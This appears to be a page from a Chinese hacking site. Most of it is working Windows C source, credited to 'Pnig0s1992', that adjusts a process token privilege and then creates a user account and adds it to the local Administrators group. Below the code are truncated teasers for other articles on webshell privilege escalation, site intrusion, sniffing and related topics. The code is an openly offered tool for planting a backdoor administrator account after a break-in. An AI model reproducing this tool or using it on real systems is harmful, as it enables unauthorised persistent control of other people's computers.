//Code by Pnig0s1992 //Date:2012,3,17 #include <stdio.h> #include <Windows.h> #include <lm.h> #pragma comment(lib,"Netapi32.lib") int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName); int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName); BOOL ImprovePriv(LPWSTR name); int main(INT argc,char * argv[]) { BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME); if(argc < 3) { printf("\nCode by Pnig0s1992"); printf("\nUsage:"); printf("\n\t%s UserName Password",argv[0]); printf("\n\tRemark:Default add to Group:Administrators."); return -1; } if(bResult) { printf("Successfully promote priv!"); }else { printf("Failed promote priv."); return -1; } int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0); wchar_t *wUserName =new wchar_t[Namesize+1]; if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize)) { return false; } int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0); wchar_t *wPassword =new wchar_t[Passsize+1]; if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize)) { return false; } LPTSTR lpName = wUserName; LPTSTR lpPassword = wPassword; LPWSTR lpSevName = NULL; LPWSTR lpGroupName = L"Administrators"; AddUser(lpName,lpPassword,lpSevName); SetGroup(lpName,lpSevName,lpGroupName); return 0; } BOOL ImprovePriv(LPWSTR name) { HANDLE hToken; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)) { printf("\nGet process token failed.(%d)",GetLastError()); return FALSE; } TOKEN_PRIVILEGES tkp; tkp.PrivilegeCount = 1; if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid)) { printf("\nLookup process priv failed.(%d)",GetLastError()); return FALSE; } tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL)) { printf("\nAjust process priv failed.(%d)",GetLastError()); return FALSE; } CloseHandle(hToken); return TRUE; } int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName) { USER_INFO_1 ui; DWORD dwLevel = 1; DWORD dwError = 0; NET_API_STATUS nStatus; ui.usri1_name = lpUsername; ui.usri1_password = lpPassword; ui.usri1_priv = USER_PRIV_USER; ui.usri1_home_dir = NULL; ui.usri1_comment = NULL; ui.usri1_flags = UF_SCRIPT; ui.usri1_script_path = NULL; nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError); if(nStatus == NERR_Success) { printf("\nAdd user:%S successfully!",lpUsername); }else { printf("\nAdd user failed:%d.",nStatus); } return 0; } int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName) { NET_API_STATUS nStatus; LOCALGROUP_MEMBERS_INFO_3 lgui; lgui.lgrmi3_domainandname = lpUsername; nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1); if(nStatus == NERR_Success) { printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName); }else if(nStatus == NERR_GroupNotFound) { printf("\nCan't find such a group:%S.",lpGroupName); }else { printf("\nSet GROUP:%S failed.",lpGroupName); } return 0; }
原创作者:泪舞 Qq:8109217 ( 转载请写上作者名 ) 苦逼的黑阔们,你是否和我一样深夜一个人在电脑前默默研究技术!...
一般通用性web程序流程是假如想要知道域名并不是一件简易的事儿,假如用一个固定不动的URI来做为网站域名会出现各种各样不便。开发者一般是依靠HTTP Host header(例如在php里是_SER...
利用软件控制正规网站,然后植入自己客户的非法广告,借以躲避百度等搜索网站的封杀。近日,安徽省庐江县检察院以涉嫌非法控制计算机信息系统罪将张家恒、陈安、潘志刚三人提起公诉。 互联网上灰色产业催生黑客技...
本文介绍一个用C语言和网络数据包分析开发工具实现的简易网络Sniffer。目前,已经有不少的Sniff工具软件,如Windows环境下,最富盛名的工具是Netxray和Sniffer pro,用它们在...
rar.exe是什么?它是winrar自带的命令行解压程序。用于DOS命令配合其参数代码就能灵活运用在提权中,经常用在打包下载的各种文件。 用法: 得到了Websh...
今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接: http://www.xxx.cn/news_list....